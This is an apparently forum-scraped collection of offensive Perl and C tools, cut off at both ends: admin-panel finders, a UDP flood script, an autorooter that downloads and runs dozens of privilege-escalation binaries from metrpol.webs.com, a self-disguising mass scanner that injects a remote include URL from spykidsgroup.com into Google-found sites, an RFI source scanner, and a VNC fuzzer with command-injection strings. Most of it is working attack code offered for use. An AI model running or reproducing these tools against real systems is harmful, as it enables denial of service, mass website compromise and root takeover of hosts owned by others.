	"webadmin.php","webadmin","miembro","miembros","administrador","administration",

	"config.php.inc","config.php.inc~","configuration.php.inc","configuration.php.inc~",

	"DBConnection.inc","includesDBConnection.inc","includesDBConnection.php.inc");

	foreach $path(@paths){

		chomp($path);

		$code = $ua->get($web . $path)->status_line;

		check_code($code,$path);

	}

}

sub check_code{

	$ncode = shift;

	$path = shift;

	$wp = $webcl . $path;

	if($ncode =~ /200/){

		OUT("$wp\t=>\t200 OK\n");

	}

	if($ncode =~ /401/){

		OUT("$wp\t=>\t401 Authorization Required\n");

	}

	if($ncode =~ /403/){

		OUT("$wp\t=>\t403 Forbidden\n");

	}

	if($ncode =~ /500/){

		OUT("$wp\t=>\t500 Internal Server Error\n");

	}

}

sub clear{

	$website = shift;

	if($website !~ /^http/){

		$website = 'http://' . $website;

	}

	if($website !~ /\/$/){

		$website.='/';

	}

	return $website;

}

sub OUT{

	$msg = shift;

	syswrite STDOUT, "$msg";

}

#!/usr/bin/perl

##
#KuNdUz
##

#     !!!! * Insert string search = Login or login, Password or password, Username or username, Admin or admin, Sing or sing * !!!!

use IO::Socket;
use HTTP::Request;
use LWP::UserAgent;

system('cls');
system('title Admin Control Panel Finder');

print"\n";
print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
print "\t<                                    <\n";
print "\t>     Admin Control Panel Finder     >\n";
print "\t<                                    <\n";
print "\t> 08/10/08           Coded_By_KuNdUz >\n";
print "\t<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n";
print "\n";

print "~ Enter Site\n\n-> ";
$site=<STDIN>;
chomp $site;

if ( $site !~ /^http:/ ) {
$site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}
print "\n";
print "~ Insert string search\n(ex: Username or Password or Senha or Admin vs..)\n\n-> ";
$string=<STDIN>;
chomp $string;
print "\n";

print "~ Scaning...\n\n";

$a1="admin1.php";
$a2="admin1.html";
$a3="admin2.php";
$a4="admin2.html";
$a5="yonetim.php";
$a6="yonetim.html";
$a7="yonetici.php";
$a8="yonetici.html";
$a9="admin/";
$a10="admin/account.php";
$a11="admin/account.html";
$a12="admin/index.php";
$a13="admin/index.html";
$a14="admin/login.php";
$a15="admin/login.html";
$a16="admin/home.php";
$a17="admin/controlpanel.html";
$a18="admin/controlpanel.php";
$a19="admin.php";
$a20="admin.html";
$a21="admin/cp.php";
$a22="admin/cp.html";
$a23="cp.php";
$a24="cp.html";
$a25="administrator/";
$a26="administrator/index.html";
$a27="administrator/index.php";
$a28="administrator/login.html";
$a29="administrator/login.php";
$a30="administrator/account.html";
$a31="administrator/account.php";
$a32="administrator.php";
$a33="administrator.html";
$a34="login.php";
$a35="login.html";
$a36="modelsearch/login.php";
$a37="moderator.php";
$a38="moderator.html";
$a39="moderator/login.php";
$a40="moderator/login.html";
$a41="moderator/admin.php";
$a42="moderator/admin.html";
$a43="moderator/";
$a44="account.php";
$a45="account.html";
$a46="controlpanel.php";
$a47="controlpanel.html";
$a48="admincontrol.php";
$a49="admincontrol.html";
$a50="admin/account.php";
$a51="admin/account.html";
$a52="adminpanel.php";
$a53="adminpanel.html";
$a54="admin1.asp";
$a55="admin2.asp";
$a56="yonetim.asp";
$a57="yonetici.asp";
$a58="admin/account.asp";
$a59="admin/index.asp";
$a60="admin/login.asp";
$a61="admin/home.asp";
$a62="admin/controlpanel.asp";
$a63="admin.asp";
$a64="admin/cp.asp";
$a65="cp.asp";
$a66="administrator/index.asp";
$a67="administrator/login.asp";
$a68="administrator/account.asp";
$a69="administrator.asp";
$a70="login.asp";
$a71="modelsearch/login.asp";
$a72="moderator.asp";
$a73="moderator/login.asp";
$a74="moderator/admin.asp";
$a75="account.asp";
$a76="controlpanel.asp";
$a77="admincontrol.asp";
$a78="admin/account.asp";
$a79="adminpanel.asp";

for ($i=1;$i<80;$i++){

$add=a.$i;
chomp $add;

$final=$site.$$add;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if($response->content =~ /$string/){
print " \n [+] Yepp -> $final\n\n";
}else{
print "[-] Not Found <- $final\n";
}
}
##
# KuNdUz
##

#!/usr/bin/perl
#####################################################
# udp flood.
######################################################

use Socket;
use strict;
use Getopt::Long;
use Time::HiRes qw( usleep gettimeofday ) ;

our $port = 0;
our $size = 0;
our $time = 0;
our $bw   = 0;
our $help = 0;
our $delay= 0;

GetOptions(
	"port=i" => \$port,		# UDP port to use, numeric, 0=random
	"size=i" => \$size,		# packet size, number, 0=random
	"bandwidth=i" => \$bw,		# bandwidth to consume
	"time=i" => \$time,		# time to run
	"delay=f"=> \$delay,		# inter-packet delay
	"help|?" => \$help);		# help
	

my ($ip) = @ARGV;

if ($help || !$ip) {
  print <<'EOL';
flood.pl --port=dst-port --size=pkt-size --time=secs
         --bandwidth=kbps --delay=msec ip-address

Defaults:
  * random destination UDP ports are used unless --port is specified
  * random-sized packets are sent unless --size or --bandwidth is specified
  * flood is continuous unless --time is specified
  * flood is sent at line speed unless --bandwidth or --delay is specified

Usage guidelines:
  --size parameter is ignored if both the --bandwidth and the --delay 
    parameters are specified.

  Packet size is set to 256 bytes if the --bandwidth parameter is used 
    without the --size parameter

  The specified packet size is the size of the IP datagram (including IP and
  UDP headers). Interface packet sizes might vary due to layer-2 encapsulation.

Warnings and Disclaimers:
  Flooding third-party hosts or networks is commonly considered a criminal activity.
  Flooding your own hosts or networks is usually a bad idea
  Higher-performace flooding solutions should be used for stress/performance tests
  Use primarily in lab environments for QoS tests
EOL
  exit(1);
}

if ($bw && $delay) {
  print "WARNING: computed packet size overwrites the --size parameter ignored\n";
  $size = int($bw * $delay / 8);
} elsif ($bw) {
  $delay = (8 * $size) / $bw;
}

$size = 256 if $bw && !$size;

($bw = int($size / $delay * 8)) if ($delay && $size);

my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 1000000);
socket(flood, PF_INET, SOCK_DGRAM, 17);

print "Flooding $ip " . ($port ? $port : "random") . " port with " . 
  ($size ? "$size-byte" : "random size") . " packets" . ($time ? " for $time seconds" : "") . "\n";
print "Interpacket delay $delay msec\n" if $delay;
print "total IP bandwidth $bw kbps\n" if $bw;
print "Break with Ctrl-C\n" unless $time;

die "Invalid packet size requested: $size\n" if $size && ($size < 64 || $size > 1500);
$size -= 28 if $size;
for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1024-64)+64) ;
  $pport = $port ? $port : int(rand(65500))+1;

  send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));
  usleep(1000 * $delay) if $delay;
}

#!/usr/bin/perl 
# Exploit tools v1.0 coded by MeTRp0L - [email protected]
# Only for linux 
# ur shell must have good perl and gcc.. 
# by MeTRp0L
{ 
system("wget http://metrpol.webs.com/05"); 
system("chmod 777 05"); 
system("./05"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/2.6.9-55-2007-prv8"); 
system("chmod 777 2.6.9-55-2007-prv8"); 
system("./2.6.9-55-2007-prv8"); 
system("./2.6.9-55-2007-prv8"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/55"); 
system("chmod 777 55"); 
system("./55"); 
system("./55"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/12"); 
system("chmod 777 12"); 
system("./12"); 
system("./12"); 
system("id");
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/18"); 
system("chmod 777 18"); 
system("./18"); 
system("./18"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/krad2"); 
system("chmod 777 krad2"); 
system("./krad2"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/06"); 
system("chmod 777 06"); 
system("./06"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/7"); 
system("chmod 777 7"); 
system("./7"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/7-2"); 
system("chmod 777 7-2"); 
system("./7-2"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/8"); 
system("chmod 777 8"); 
system("./8"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/8a"); 
system("chmod 777 8a"); 
system("./8a"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/8bb"); 
system("chmod 777 8bb"); 
system("./8bb"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/8cc"); 
system("chmod 777 8cc"); 
system("./8cc"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/8x"); 
system("chmod 777 8x"); 
system("./8x"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/9"); 
system("chmod 777 9"); 
system("./9"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com77"); 
system("chmod 777 77"); 
system("./77"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/78"); 
system("chmod 777 78"); 
system("./78"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/ptrace-kmod"); 
system("chmod 777 ptrace-kmod"); 
system("./ptrace-kmod"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/elflbl"); 
system("chmod 777 elflbl"); 
system("./elflbl"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/kmod"); 
system("chmod 777 kmod"); 
system("./kmod"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/newlocal"); 
system("chmod 777 newlocal"); 
system("./newlocal"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/27799"); 
system("chmod 777 27799"); 
system("./27799"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget downloads.securityfocus.com/vulnerabilities/exploits/27704.c"); 
system("gcc 27704.c -o 27704");  
system("chmod 777 27704"); 
system("./27704"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/k-rad3"); 
system("chmod 777 k-rad3"); 
system("./k-rad3 -t 1 -p 2"); 
system("./k-rad3 -t 1 -p 3"); 
system("./k-rad3 -t 1 -p 4"); 
system("./k-rad3 -t 1 -p 5"); 
system("./k-rad3 -t 1 -p 6"); 
system("./k-rad3 -t 1 -p 7"); 
system("./k-rad3 -t 1 -p 8"); 
system("./k-rad3 -t 1 -p 9"); 
system("./k-rad3 -t 1 -p 10"); 
system("./k-rad3 -t 1 -p 11"); 
system("./k-rad3 -t 1 -p 12"); 
system("./k-rad3 -t 1 -p 13"); 
system("./k-rad3 -t 1 -p 14"); 
system("./k-rad3 -t-p 2"); 
system("./k-rad3 -t-p 2"); 
system("./k-rad3 -t-p 3"); 
system("./k-rad3 -t-p 4"); 
system("./k-rad3 -t-p 5");  
system("./k-rad3 -a -p 7"); 
system("./k-rad3 -a -p 7"); 
system("./k-rad3 -a -p 8"); 
system("./k-rad3 -a -p 8"); 
system("./k-rad3 -a -p 9"); 
system("./k-rad3 -a -p 9"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/pwned"); 
system("chmod 777 pwned"); 
system("./pwned"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/krad"); 
system("chmod 777 krad"); 
system("./krad -t 1 -p 2"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/r00t"); 
system("chmod 777 r00t"); 
system("./r00t"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/2.4.34"); 
system("chmod 777 2.4.34"); 
system("./2.4.34"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/lezr-km"); 
system("chmod 777 lezr-km");  
system("./lezr-km"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/mremap_pte"); 
system("chmod 777 mremap_pte");  
system("./mremap_pte"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/ong_bak"); 
system("chmod 777 ong_bak");  
system("./ong_bak -10023411"); 
system("./ong_bak -10029"); 
system("./ong_bak -10023"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/ptrace24"); 
system("chmod 777 ptrace24");  
system("./ptrace24"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/pwned3"); 
system("chmod 777 pwned3");  
system("./pwned3"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/loginx"); 
system("chmod 777 loginx");  
system("./loginx"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/myptrace"); 
system("chmod 777 myptrace");  
system("./myptrace"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/x"); 
system("chmod 777 x");  
system("./x"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n"; 
system("wget http://metrpol.webs.com/crond"); 
system("chmod 777 crond");  
system("./crond"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n";  
system("wget http://metrpol.webs.com/uselib24"); 
system("chmod 777 uselib24"); 
system("./uselib24"); 
system("id"); 
print "If u r r00t stop xpl with ctrl+c\n";  
print "If u arent im sorry xpl session finished \n"; 
} 

#!/usr/bin/perl

use LWP::Simple;
use IO::Socket::INET;



print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\t[ PHP injection scanner 5.0 priv8 version by poerschke ]\n\t[ irc.gigachat.net #spykids ]\n\n\n";

if(!@ARGV[0]){
print "\t[ use: perl php5.0.pl <procura> ]\n\n";
exit;
}
print "\t[ Camuflando pid ]\n";
my $processo = "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";

$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

print "\t[ Pid: $pid Processo: $processo ]\n";

$caxe = ".";
$caxe1 = ".";
$caxe .= rand(9999);
$caxe1 .= rand(9999);
$arq = ".";
$arq = int rand(9999);

open(sites,">$arq");
print sites "";
close(sites);


$procura = @ARGV[0];
chomp $procura;
print "\t[ Procurando por $procura no Google ]\n";
for($n=0;$n<900;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
print $sock "Host: www.google.com.br";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
print $sock "Accept-Language: pt-br, pt;q=0.50";
print $sock "Accept-Encoding: gzip, deflate, compress;q=0.9";
print $sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
print $sock "Keep-Alive: 300";
print $sock "Connection: keep-alive";

@resu = <$sock>;
close($sock);
$ae = "@resu";
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
  $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
  $uber=$1;
   if ($uber !~/translate/)
   {
   if ($uber !~ /cache/)
   {
   if ($uber !~ /"/)
   {
   if ($uber !~ /google/)
   {
   if ($uber !~ /216/)
   {
   if ($uber =~/http/)
   {
   if ($uber !~ /start=/)
   {
     open(arq,">>$arq");
          print arq "$uber\n";
          close(arq);
}}}}}}}}}
print "\t[ Procurando por $procura no Cade   ]\n";

for($cadenu=1;$cadenu <= 991; $cadenu +=10){

@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
$ae = "@cade";

while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
  $ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
  $uber=$1;

$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/<\/b>//g;

open(a,">>$arq");
print a "$uber\n";
close(a);
}}
print "\t[ Pronto sites pegos no google e cade ]\n";
print "\t[ Excluindo os sites repetidos ]\n";
$ark = $arq;
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);


$a =0;
$b =0;
open(ae,"<$arq");
while(<ae>)
{$sites[$a] = $_;
  chomp $sites[$a];
  $a++;
  $b++;}
close(ae);
print "\t[ Total de sites para scanear: $a ]\n";
for ($a=0;$a<=$b;$a++){
open (file, ">$caxe");
      print file "";
close(file);
open (file, ">$caxe1");
      print file "";
close(file);
$k=0;
$e=0;
$data=get($sites[$a]) or next;
  while($data=~ m/<a href=".*?">.*?<\/a>/){
  $data=~ s/<a href="(.*?)">.*?<\/a>/$1/;
  $ubersite=$1;

  if ($ubersite =~/"/)
   {
   $nu = index $ubersite, '"';
   $ubersite = substr($ubersite,0,$nu);
   }
if ($ubersite !~/http/)
{$ubersite = $sites[$a].'/'.$ubersite;}
open(file,">>$caxe") || die("nao abriu caxe.txt $!");
print file "$ubersite\n";
close(file);
}

$lista1 = 'http://www.spykidsgroup.com/spy.gif?&cmd=ls%20/';
$t =0;
$y =0;
@ja;
open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
while (<opa>)
{
$ja[$t] = $_;
chomp $ja[$t];
$t++;
$y++;
}
close(opa);
$t=1;
while ($t < $y)
   {
    if ($ja[$t] =~/=/)
      {
       $num = rindex $ja[$t], '=';
       $num += 1;
       $ja[$t] = substr($ja[$t],0,$num);   
            open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
            print jaera "$ja[$t]$lista1\n";
            close(jaera);
        $num = index $ja[$t], '=';
        $num += 1;
        $ja[$t] = substr($ja[$t],0,$num);       
        $num1 = rindex $ja[$t], '.';
        $subproc = substr($ja[$t],$num1,$num);
         
            open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
            print jaera "$ja[$t]$lista1\n";
            close(jaera);
      }
     $t++;
     }
$ark = "$caxe1";
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);
   $q=0;
   $w=0;
    @hot;
   open (ops,"<$caxe1");
   while(<ops>)
   {
   $hot[$q] = $_;
   chomp $hot[$q];
   $q++;
   $w++;
   }
   close(ops);
print "\t[ ComeiƒÆ'i,§ando o scan aguarde. Pode demorar horas. ]\n";
for($q=0;$q<=$w;$q++)
  {

  if ($hot[$q] =~/http/)
    {
   $tipo=get($hot[$q]) or next;
   if($tipo =~/root/)
         {
         if ($tipo =~/etc/)
          {
          if ($tipo =~/boot/)
           {
    open(a,">>res.txt");
    print a "$hot[$q]\n";
    close(a);
                 }}}}}}

print "\t[ Pronto scanner concluido ]\n";
print "\t[ O resultado foi salvo no ftp do spykids ]\n"; 

/*
   RFI Scanner By DiGitalX ([email protected])
   Date: 6/4/2007 -- MicroSystem Team
*/

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>

//#define _DEBUG //debug mode (for me :D)
#define DEBUG_ROOT "output"

//put the vuln functions here
//functions that if a var is in its arguments then possible RFI occurs
//IMPORTANT: keep this order
char* vuln[] = {
   "include_once", "include", "require_once", "require", NULL
};

//global
BOOL bShortDis = FALSE;

void usage(char* app)
{
   printf("usage: [-s] %s <root-directory>\n", app);
   printf("\t-s\tshort display mode\n");
}

void banner(void)
{
   printf("RFI Scanner By DiGitalX ([email protected])\n");
   printf("Date: 6/4/2007 -- MicroSystem Team\n\n");
}

//return: FALSE if EOF reached, TRUE otherwise
BOOL freadline(FILE* f, char* line, int size)
{
   int b, i = 0;

   //zero line
   memset(line, 0, size);

   do {
      //read one byte
      b = fgetc(f);
      //check if EOF
      if (b == EOF) return FALSE;
      //check if newline cha reached or line is full
      if ((b == '\n') || (i == 1023)) return TRUE;
      *line++ = b; //fill line
      i++; //increment counter
   } while (1);

   return 1; /* unreachable code */
}

BOOL php_scanfile(char* file)
{
   char line[1024], line2[1024];
   int linenum = 0;
   BOOL notend;
   char* tmp, *tmp2, *x;

   //open file
   FILE* f = fopen(file, "rb");
   //check
   if (f == NULL)
      return FALSE;

   do {
      //opened, then read line by line
      notend = freadline(f, line, sizeof(line));
      linenum++;

      //lower the line
      strcpy(line2, line);
      CharLower(line2);

      for (int i = 0; vuln[i] != NULL; i++) {
         //now line contains one line of code, search for RFI functions
         //include, include_once, require, require_once
         tmp = strstr(line2, vuln[i]);
         if (tmp != NULL) {
            //line contains vuln function maybe RFI.
            //check if function
            tmp += strlen(vuln[i]); //skip function name
            while (*tmp != '(') {
               //check if end of line reached or someother char (not whitespace means not function)
               if (*tmp == '\0') goto next; //then goto next vuln function
               //check if there's crap between vuln function and the first '(' reached
               //if so then it's not a vuln function maybe comment or var or string or something else
               if ((*tmp != ' ') && (*tmp != '\t')) goto next; //just dun bother and goto next vuln function
               tmp++; //keep incrementing tmp until catching '(' [opening parentheses of the vuln function]
            }
            //check for var inside this function
            tmp2 = tmp; //set tmp2 at begin of include function
            while (*tmp2 != ')') {
               tmp2++; //keep incrementing tmp2 until catching ')' [closing parentheses of the include function]
               //check if end of line reached
               if (*tmp2 == '\0') goto next; //then goto next vuln function
            }
            x = tmp; //set x at begin of include function
            while ((*x != '$') && (x < tmp2)) x++; //keep incrementing x until catching a var inside include functino or include function closing parentheses
            //check which condition just holded
            if (*x == '$') {
               //BINGO, possible RFI cought :D
               printf("possible RFI at line: %u", linenum);
               //if bShortDis then provide filename
               if (bShortDis) printf(" in \"%s\"\n", file);
               else printf("\n"); //otherwise just newline
               break; //break off the for loop
            }
         }
         next:
      }
     
      if (!notend) break; //NOT not end == end :D
   } while (1);

   fclose(f);
   return TRUE;
}

void php_search(void) {
   WIN32_FIND_DATA wfd;
   HANDLE fh;
   char lpBuffer[320];
   char *lpFilePart;

   fh = FindFirstFile("*.*",&wfd);
   if (fh != INVALID_HANDLE_VALUE) {
      do {
         // skip '.' and '..' dirs
         if (wfd.cFileName[0] == '.') continue;
         // if dir enter it
         if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
            if (SetCurrentDirectory(wfd.cFileName) == TRUE) {
               php_search(); // recursive call
               SetCurrentDirectory("..");
            }
            continue;
         }
         // otherwise carry on our process
         if (GetFullPathName(wfd.cFileName,320,lpBuffer,&lpFilePart) == 0) continue;
         CharLower(lpBuffer);
         // checking if the extension of the file is php
         if (memcmp(&lpBuffer[lstrlen(lpBuffer)-3],"php",3) == 0) {
            //skip if bShortDis is set
            if (!bShortDis) printf("Scanning %s...\n", lpBuffer);
            php_scanfile(lpBuffer);
         }
      } while (FindNextFile(fh,&wfd) == TRUE);
      FindClose(fh); // closing find handle
   }
}

BOOL begin_rfi_scan(char* root)
{
   //first set the root dir as current dir
   if (!SetCurrentDirectory(root))
      return FALSE;

   //begin the hunting for php files
   printf("Beginning Hunting RFI Vulnerabilities...\n");
   //if -s is given then inform user that mode is activated
   if (bShortDis) printf("Short Display Mode Activated\n");
   php_search();
   printf("Finished of Hunting.\n");

   return TRUE;
}

int main(int argc, char** argv)
{
   int pos = 1; //root position in cmd line

   //show banner
   banner();

   #ifndef _DEBUG
   //check if root dir is given in the cmd line
   if (argc < 2) {
      //show usage screen and exit
      usage(argv[0]);
      return 1;
   }
   #endif

   //-s switch is specified
   if (strcmp(argv[1], "-s") == 0) {
      bShortDis = TRUE; //set flag
      pos = 2; //change root position in cmd line
   }

   //root dir is given good, then scan all the files inside this root directory
   #ifndef _DEBUG
   if (!begin_rfi_scan(argv[pos])) {
   #else
   if (!begin_rfi_scan(DEBUG_ROOT)) {
   #endif
      printf("Error: initializing RFI Scanner... Try Again");
      return 1;
   }

   return 0;
} [/quote]

[quote]Es un simple scanner-RFI que escanea archivos -php o posibles vulnerabilidades como include(),require()...etc y luego chekea si hay alguna variable en los argumentos de la funcion.
Si la hay muestra el resultado para que tu chekes si hay una RFI/LFI muy feliz xD!

*Nota:
Podes poner un monton de scripts php inside a folder y cocorrer el scanner contra el mismo.

El scaner scanneara todo el directorio root (dentro de la lina cmd) y te provera cada pusible funcion bugg junto con la linea y nombre del script

#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# VNCrush - VNC Server Fuzzer
# How many more elaborate names for fuzzing tools can I come up with? Short answer: the imagination is limitless :)
# Some servers will throw out some of the fuzz strings, some won't ;)

use Net::VNC;
use Getopt::Std;

# FUZZ DATA BEGIN HERE
@overflows = ('A' x 2200, 'A' x 4200, 'A' x 8400, 'A' x 12000, 'A' x 22000, 'A' x 52000, 'A' x 102000, 'A' x 500500,
       'A' x 1002000, 'A' x 5005000, 'A' x 12000000, '//AAAA' x 8500, '\\\AAAA' x 8500, '\0x99' x 12000);

@fmtstring = ('%n%n%n%n%n', '%p%p%p%p%p', '%s%s%s%s%s', '%d%d%d%d%d', '%x%x%x%x%x',
              '%s%p%x%d', '%.1024d', '%.1025d', '%.2048d', '%.2049d', '%.4096d', '%.4097d',
              '%99999999999s', '%08x', '%%20n', '%%20p', '%%20s', '%%20d', '%%20x',
              '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%', '\0xCD' x 50, '\0xCB' x 50);

@numbers = ('0', '-0', '1', '-1', '32767', '-32768', '2147483647', '-2147483647', '2147483648', '-2147483648',
              '4294967294', '4294967295', '4294967296', '357913942', '-357913942', '536870912', '-536870912',
              '1.79769313486231E+308', '3.39519326559384E-313', '99999999999', '-99999999999', '0x100', '0x1000',
              '0x3fffffff', '0x7ffffffe', '0x7fffffff', '0x80000000', '0xffff', '0xfffffffe', '0xfffffff', '0xffffffff',
              '0x10000', '0x100000', '0x99999999', '65535', '65536', '65537', '16777215', '16777216', '16777217', '-268435455');

@miscbugs = ('test|touch /tmp/FU_ZZ_ED|test', 'test`touch /tmp/FU_ZZ_ED`test', 'test\'touch /tmp/FU_ZZ_ED\'test',
       'test;touch /tmp/FU_ZZ_ED;test', 'test&&touch /tmp/FU_ZZ_ED&&test', 'test|C:/WINDOWS/system32/calc.exe|test',
       'test`C:/WINDOWS/system32/calc.exe`test', 'test\'C:/WINDOWS/system32/calc.exe\'test', 'test;C:/WINDOWS/system32/calc.exe;test',
       'C:/WINDOWS/system32/calc.exe"', '`/bin/sh`', '%0xa', '%u000');
# FUZZ DATA END HERE

getopts('t:p:', \%opts);
$target = $opts{'t'};
$password = $opts{'p'};

if(!defined($target))
{
     print "\n VNCrush - VNC Server Fuzzer";
     print "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";
     print "\n Usage: $0 -t <target> -p <password>\n\n";
     exit(0);

}

     print "\n VNCrush - VNC Server Fuzzer";
     print "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";

     print "\nFuzzing VNC Server @ $target/$password... GOOD LUCK!\n";

print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = depth/overflow]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth($fuzz);
$vnc->login; }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = depth/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth($fuzz);
$vnc->login; }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = depth/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth($fuzz);
$vnc->login; }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = depth/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth($fuzz);
$vnc->login; }

print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = width/overflow]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->width($fuzz);
$vnc->login; }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = width/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->width($fuzz);
$vnc->login; }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = width/$fuzz]\n";
